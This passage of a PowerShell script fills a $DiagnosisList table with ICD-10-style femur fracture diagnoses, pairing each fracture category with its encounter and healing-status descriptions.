lower epiphysis (separation) of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of unspecified femur","Nondisplaced fracture of lower epiphysis (separation) of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of right femur","Displaced supracondylar fracture without intracondylar extension of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of left femur","Displaced supracondylar fracture without intracondylar extension of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture without intracondylar extension of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of right femur","Displaced supracondylar fracture with intracondylar extension of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = 